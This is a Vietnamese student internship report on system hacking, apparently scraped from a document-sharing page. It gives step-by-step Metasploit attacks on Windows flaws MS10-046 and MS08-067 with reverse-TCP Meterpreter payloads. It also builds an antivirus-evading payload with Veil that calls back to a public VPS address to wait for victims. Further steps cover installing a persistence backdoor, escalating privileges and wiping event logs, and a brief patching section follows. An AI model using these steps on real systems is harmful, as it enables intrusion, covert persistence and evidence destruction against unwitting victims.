ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
16 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
 getcwd: cho biết thư mục đang làm việc hiện tại
 ls: liệt kê các thư mục và tập tin
 upload src1 [src2 ...] dst: upload file từ src tới dst.
 download src1 [src2 ...] dst: download file từ src tới dst.
b) Sử dụng module Net
 ipconfig: xem câu hình của card mạng của máy tính từ xa
 route: xem bảng định tuyến của remote machine
c) Sử dụng module Process
 execute -f file [ -a args ] [ -Hc ]:Câu lệnh execute cho
phép tạo ra một process mới trên remote machine và sử
dụng process đó để khai thác dữ liệu
 kill pid1 pid2 pid3:huỷ hoặc tắt các process đang chạy
trên máy remote machine
 ps: liệt kê những process của remote machine
d) Sử dụng module Sys
 getuid: cho biết username hiện tại của remote machine
 sysinfo: cho biết thông tin về máy tính nạn nhân: hệ điều
hành, phiên bản, nền tản 32bits hay 64bits
5. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như
để Metasploit không thể khai thác được lỗi Lsass_ms04_011,
chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft
đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các
hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là
835732 để vá lỗi trên.
II. Lỗi MS10-046 (2286198)
1. Giới thiệu
Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell cho
tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công
chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
17 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng
08/2010, Microsoft tung ba bản vá lỗi.
Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của
Windows, các tập tin này thường nằm ở giao diện desktop hay
trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem
tập tin shortcut hay nội dung của một thư mục chứa tập tin
shortcut nhúng mã độc.
Các bản Windows bị ảnh hưởng bao gồm
2. Các bước tấn công
a. (mạng LAN)
 Khởi động Kali Linux và đăng nhập thành công ,
mở terminal ta được
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
18 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Ta gõ : msfconsole và enter
Để dùng mã lỗi ms10-046:search ms10-046 và enter
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
19 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
20 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Ta gõ tiếp: use
exploit/windows/browser/ms10_046_shortcut_icon_dllload
và enter
 Dùng Lệnh show options để xem các tham số cần
thiết để có thể tiến hành tấn công được:
o SRVHOST: địa chỉ máy của kẻ tấn công, để
lắng nghe có nạn nhân nào kết nối đến hay
không
o SRVPORT: cổng lắng nghe ,mặc định là
http(80)
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
21 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
 Tiếp theo ta sẽ
o set payload windows/meterpreter/reverse_tcp
o set srvhost 192.168.181.128
o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost
là tham số của payload mà ta vừa set ở trên
exploit để khởi động server lắng nghe trên máy tấn công
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
22 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải
chuột vào
Desktop -> New -> Shortcut
Ta gõ vào địa chỉ của máy tấn công vào Type the location of
the item:
http://192.168.1.35/anythingvà chọn Next
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
23 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở
shortcut này:
Đợi một lát, trên máy tính tấn công ta được:
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
24 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh sessions để xem các phiên làm việc mà Metasploit
đang có:
Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1
là id của sessions)
Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn
công đã điều khiển
được máy nạn nhân với toàn quyền. Ví dụ:
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
25 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Lệnh sysinfo để lấy thông tin của máy nạn nhân:
Lệnh rất hữu ích để sử dụng cmd (command-line): shell
Lấy ip victim qua cmd(dùng ipconfig) :
Xem các chương trình chạy trên máy victim (dùng tasklist):
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
26 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Thoát cmd (dùng lệnh “exit”):
sau khi hoàn thành bước xâm nhập vào máy nạn nhận, các
hacker thường tiến hành bước tiếp theo là cần duy trì để sau này
có thể truy cập lại dễ dàng mà không cần thực hiện nhiều công
đoạn. Việc duy trì kết nối thông thường bằng cách bỏ backdoor
vào máy victim
Cài Backdoor trên máy victim(câu lệnh:”run persistence” –h
để xem help):
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
27 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dựa vào trên ta dùng câu lệnh như sau:
Xong , ta đã cài backdoor vào máy victim. Cho dù victim tắt máy
, khi log on lên màn hình metasploit sẽ connect lại.
Đễ xem backdoor của mình trên máy victim ta thấy pid của
backdoor là 704 (hình trên)
Ta dùng “shell” , “ tasklist” để xem .
Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”)
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
28 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Mã lỗi ms08_067
Khởi động metasploit và search mã lỗi ms08_067
Dùng lệnh show option để xem yêu cầu
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
29 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Set các giá trị
RHOST : IP victim
RPORT : mặc định
PAYLOAD : thư viện sử dụng
LHOST : IP máy attack
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
30 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh exploit để tiến hành tấn công
Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được
máy victim
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
31 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh screenshot để chup màn hinh victim … và còn
nhiều chức năng khác .
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
32 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
b. Triễn Khai trên vps
Mã hóa bằng Veil
cd Veil-Evasion
./Veil-Evasion.py
list
use python/meterpreter/rev_tcp
set LHOST 162.250.123.132
setcompile_to exe Y
generate
*filename*
ởđây mình dùng vpslinux Ubuntu server
download putty.exe và đăng nhập
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
33 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
download và tải metasploit + Veil
gõmsfconsole và sữdụng lệnh : use exploit/multi/hander
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
34 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
tiếp theo ta sẽ:
set payload windows/meterpreter/reverse_tcp
show options
setlhost<dia chi ipvps> - set lhost 162.250.123.132
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
35 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
ta được giao diện nhưsau :
Xong ta gõ exploit và đợi victim nhiễm nhưbên vps .
nâng quyền ta dùng getsystem – lưu ý chỉ sữdụng khi user hiện tại là
administraitor
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
36 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
III. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị
hacker lợi dụng.
Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới
của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows,
nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị
lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh
chết chóc" hay Blue Screen.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
37 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
TÀI LIỆU THAM KHẢO
[1]. Trang Web: hackforums.net
[2]. Trang Web: ubers.org
[3]. Trang web :forum.whitehat.vn
[4] Tài Liệu Học Tập Athena – Bộ CD System Hacking
[5] Kali CookBook
THE END

More Related Content

Viewers also liked

Geo23.1102 winter2015 session1
Geo23.1102 winter2015 session1Geo23.1102 winter2015 session1
Geo23.1102 winter2015 session1Melanie Zurba
 
Team conference call for nov 25, 12
Team conference call for nov 25, 12Team conference call for nov 25, 12
Team conference call for nov 25, 12detox4beauty
 
Geo23.1103 winter2015 session6
Geo23.1103 winter2015 session6Geo23.1103 winter2015 session6
Geo23.1103 winter2015 session6Melanie Zurba
 
Componentes de la Computadora
Componentes de la ComputadoraComponentes de la Computadora
Componentes de la Computadoraezeypablito
 
Silabo de Ensamblaje y matenimiento
 Silabo de Ensamblaje y matenimiento Silabo de Ensamblaje y matenimiento
Silabo de Ensamblaje y matenimientoChars Orden
 
Componentes de un proyecto
Componentes de un proyectoComponentes de un proyecto
Componentes de un proyectoMariana V Diaz
 
Escher tessellations
Escher tessellationsEscher tessellations
Escher tessellationserikatsma
 
ALASAN - HARGA PRODUK MAHAL
ALASAN - HARGA PRODUK MAHALALASAN - HARGA PRODUK MAHAL
ALASAN - HARGA PRODUK MAHALAry Praptono
 
Western Division Newsletter - Issue 002
Western Division Newsletter - Issue 002Western Division Newsletter - Issue 002
Western Division Newsletter - Issue 002Jamie Slaughter
 
Nuestra computadora ideal...
Nuestra computadora ideal...Nuestra computadora ideal...
Nuestra computadora ideal...nticxjb
 
Dp 20150211 enquete_prix-selon-format
Dp 20150211 enquete_prix-selon-formatDp 20150211 enquete_prix-selon-format
Dp 20150211 enquete_prix-selon-formaticicnancyfr
 
Desarrollo guia de aprendizaje # 1
Desarrollo guia de aprendizaje # 1Desarrollo guia de aprendizaje # 1
Desarrollo guia de aprendizaje # 1LEIDYYURANYSALGUERO
 
Los huracanes
Los huracanesLos huracanes
Los huracanescondejuan
 

Viewers also liked (20)

Geo23.1102 winter2015 session1
Geo23.1102 winter2015 session1Geo23.1102 winter2015 session1
Geo23.1102 winter2015 session1
 
Team conference call for nov 25, 12
Team conference call for nov 25, 12Team conference call for nov 25, 12
Team conference call for nov 25, 12
 
Cosas para hacer en internet
Cosas para hacer en internetCosas para hacer en internet
Cosas para hacer en internet
 
Geo23.1103 winter2015 session6
Geo23.1103 winter2015 session6Geo23.1103 winter2015 session6
Geo23.1103 winter2015 session6
 
Componentes de la Computadora
Componentes de la ComputadoraComponentes de la Computadora
Componentes de la Computadora
 
Leisure Batteries
Leisure BatteriesLeisure Batteries
Leisure Batteries
 
Silabo de Ensamblaje y matenimiento
 Silabo de Ensamblaje y matenimiento Silabo de Ensamblaje y matenimiento
Silabo de Ensamblaje y matenimiento
 
Fisica
FisicaFisica
Fisica
 
Componentes de un proyecto
Componentes de un proyectoComponentes de un proyecto
Componentes de un proyecto
 
#MAForum en lainformacion.com
#MAForum en lainformacion.com #MAForum en lainformacion.com
#MAForum en lainformacion.com
 
Escher tessellations
Escher tessellationsEscher tessellations
Escher tessellations
 
ALASAN - HARGA PRODUK MAHAL
ALASAN - HARGA PRODUK MAHALALASAN - HARGA PRODUK MAHAL
ALASAN - HARGA PRODUK MAHAL
 
Western Division Newsletter - Issue 002
Western Division Newsletter - Issue 002Western Division Newsletter - Issue 002
Western Division Newsletter - Issue 002
 
Nuestra computadora ideal...
Nuestra computadora ideal...Nuestra computadora ideal...
Nuestra computadora ideal...
 
Dp 20150211 enquete_prix-selon-format
Dp 20150211 enquete_prix-selon-formatDp 20150211 enquete_prix-selon-format
Dp 20150211 enquete_prix-selon-format
 
Desarrollo guia de aprendizaje # 1
Desarrollo guia de aprendizaje # 1Desarrollo guia de aprendizaje # 1
Desarrollo guia de aprendizaje # 1
 
Logos
LogosLogos
Logos
 
Los huracanes
Los huracanesLos huracanes
Los huracanes
 
Books
BooksBooks
Books
 
Human Digestive System
Human Digestive SystemHuman Digestive System
Human Digestive System
 

Similar to Doan_duy_khiem

Bao caocuoiky phanvanmanh
Bao caocuoiky phanvanmanhBao caocuoiky phanvanmanh
Bao caocuoiky phanvanmanhMaster Phan
 
Báo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTBáo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTPac CE
 
Báo cáo cuối kỳ - thực tập Athena
Báo cáo cuối kỳ - thực tập AthenaBáo cáo cuối kỳ - thực tập Athena
Báo cáo cuối kỳ - thực tập AthenaPac CE
 
Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huyhoaihuysc
 
Huynh hongkhoi 306111306_cdth11c
Huynh hongkhoi 306111306_cdth11cHuynh hongkhoi 306111306_cdth11c
Huynh hongkhoi 306111306_cdth11cHôKa Huyn
 
BaoCaoThucTap_NguyenTruongNhatNam
BaoCaoThucTap_NguyenTruongNhatNamBaoCaoThucTap_NguyenTruongNhatNam
BaoCaoThucTap_NguyenTruongNhatNamNguyễn Nam
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoavu1008
 
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...DV Viết Luận văn luanvanmaster.com ZALO 0973287149
 
Bao mat ung_dung_web
Bao mat ung_dung_webBao mat ung_dung_web
Bao mat ung_dung_webDuy Vọng
 
Bao mat ung_dung_web
Bao mat ung_dung_webBao mat ung_dung_web
Bao mat ung_dung_webViet Nam
 
Bảo mật ứng dụng web
Bảo mật ứng dụng webBảo mật ứng dụng web
Bảo mật ứng dụng webabesoon
 
BaoCaoThucTapTN
BaoCaoThucTapTNBaoCaoThucTapTN
BaoCaoThucTapTNtrong1763
 
Báo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc NghịBáo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc Nghịblue_abc
 

Similar to Doan_duy_khiem (20)

Bao caocuoiky phanvanmanh
Bao caocuoiky phanvanmanhBao caocuoiky phanvanmanh
Bao caocuoiky phanvanmanh
 
Kế Toán Thu, Chi Và Kết Quả Các Hoạt Động Tại Học Viện Y - Dược Học Cổ Truyền...
Kế Toán Thu, Chi Và Kết Quả Các Hoạt Động Tại Học Viện Y - Dược Học Cổ Truyền...Kế Toán Thu, Chi Và Kết Quả Các Hoạt Động Tại Học Viện Y - Dược Học Cổ Truyền...
Kế Toán Thu, Chi Và Kết Quả Các Hoạt Động Tại Học Viện Y - Dược Học Cổ Truyền...
 
Báo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTBáo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTT
 
Báo cáo cuối kỳ - thực tập Athena
Báo cáo cuối kỳ - thực tập AthenaBáo cáo cuối kỳ - thực tập Athena
Báo cáo cuối kỳ - thực tập Athena
 
Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huy
 
Luận án: Nghiên cứu cải tiến cơ chế điều khiển tại các nút mạng
Luận án: Nghiên cứu cải tiến cơ chế điều khiển tại các nút mạngLuận án: Nghiên cứu cải tiến cơ chế điều khiển tại các nút mạng
Luận án: Nghiên cứu cải tiến cơ chế điều khiển tại các nút mạng
 
Huynh hongkhoi 306111306_cdth11c
Huynh hongkhoi 306111306_cdth11cHuynh hongkhoi 306111306_cdth11c
Huynh hongkhoi 306111306_cdth11c
 
BaoCaoThucTap_NguyenTruongNhatNam
BaoCaoThucTap_NguyenTruongNhatNamBaoCaoThucTap_NguyenTruongNhatNam
BaoCaoThucTap_NguyenTruongNhatNam
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...
Bảo vệ bản quyền các cơ sở dữ liệu quan hệ trong hệ thống quản lý giáo dục bằ...
 
Bao mat ung_dung_web
Bao mat ung_dung_webBao mat ung_dung_web
Bao mat ung_dung_web
 
Bao mat ung_dung_web
Bao mat ung_dung_webBao mat ung_dung_web
Bao mat ung_dung_web
 
Bảo mật ứng dụng web
Bảo mật ứng dụng webBảo mật ứng dụng web
Bảo mật ứng dụng web
 
Công Tác Xã Hội Nhóm Trong Phòng Ngừa Trẻ Em Có Nguy Cơ Bị Xâm Hại Tình Dục.docx
Công Tác Xã Hội Nhóm Trong Phòng Ngừa Trẻ Em Có Nguy Cơ Bị Xâm Hại Tình Dục.docxCông Tác Xã Hội Nhóm Trong Phòng Ngừa Trẻ Em Có Nguy Cơ Bị Xâm Hại Tình Dục.docx
Công Tác Xã Hội Nhóm Trong Phòng Ngừa Trẻ Em Có Nguy Cơ Bị Xâm Hại Tình Dục.docx
 
BaoCaoThucTapTN
BaoCaoThucTapTNBaoCaoThucTapTN
BaoCaoThucTapTN
 
Đánh giá hiệu quả hoạt động bán hàng đối với dịch vụ internet thông qua websi...
Đánh giá hiệu quả hoạt động bán hàng đối với dịch vụ internet thông qua websi...Đánh giá hiệu quả hoạt động bán hàng đối với dịch vụ internet thông qua websi...
Đánh giá hiệu quả hoạt động bán hàng đối với dịch vụ internet thông qua websi...
 
Báo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc NghịBáo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc Nghị
 
Athena
AthenaAthena
Athena
 
Nghiên cứu hệ thống quản lý học tập LMS.docx
Nghiên cứu hệ thống quản lý học tập LMS.docxNghiên cứu hệ thống quản lý học tập LMS.docx
Nghiên cứu hệ thống quản lý học tập LMS.docx
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 

Recently uploaded

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...Nguyen Thanh Tu Collection
 
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoiC6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoidnghia2002
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhdtlnnm
 
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfxemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfXem Số Mệnh
 
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdfltbdieu
 
Bài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiệnBài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiệnpmtiendhti14a5hn
 
Đề thi tin học HK2 lớp 3 Chân Trời Sáng Tạo
Đề thi tin học HK2 lớp 3 Chân Trời Sáng TạoĐề thi tin học HK2 lớp 3 Chân Trời Sáng Tạo
Đề thi tin học HK2 lớp 3 Chân Trời Sáng Tạowindcances
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...hoangtuansinh1
 
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptx
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptxBài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptx
Bài tập nhóm Kỹ Năng Gỉai Quyết Tranh Chấp Lao Động (1).pptxDungxPeach
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...Nguyen Thanh Tu Collection
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhdangdinhkien2k4
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfNguyen Thanh Tu Collection
 
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...
TUYỂN TẬP 50 ĐỀ LUYỆN THI TUYỂN SINH LỚP 10 THPT MÔN TOÁN NĂM 2024 CÓ LỜI GIẢ...Nguyen Thanh Tu Collection
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docxTHAO316680
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfXem Số Mệnh
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...Nguyen Thanh Tu Collection
 
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxbài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxTrnHiYn5
 

Recently uploaded (20)

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
